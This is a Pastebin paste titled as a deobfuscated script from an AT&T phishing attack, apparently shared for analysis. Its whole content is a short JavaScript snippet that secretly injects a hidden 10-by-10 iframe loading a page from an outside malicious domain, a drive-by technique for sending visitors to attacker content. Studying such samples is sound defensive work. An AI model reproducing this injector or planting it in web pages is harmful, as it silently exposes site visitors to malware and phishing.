Advertisement
adityaks

AT&T Phishing Attack - Deobfuscated script

Aug 6th, 2012
715
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. if (document.getElementsByTagName('body')[0]){
  2.             iframer();
  3.         } else {
  4.             document.write("<iframe src='http://voicecontroldevotes.info/main.php?page=6df8994172330e77' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  5.         }
  6.         function iframer(){
  7.             var f = document.createElement('iframe');f.setAttribute('src','http://voicecontroldevotes.info/main.php?page=6df8994172330e77');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
  8.             document.getElementsByTagName('body')[0].appendChild(f);
  9.         }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement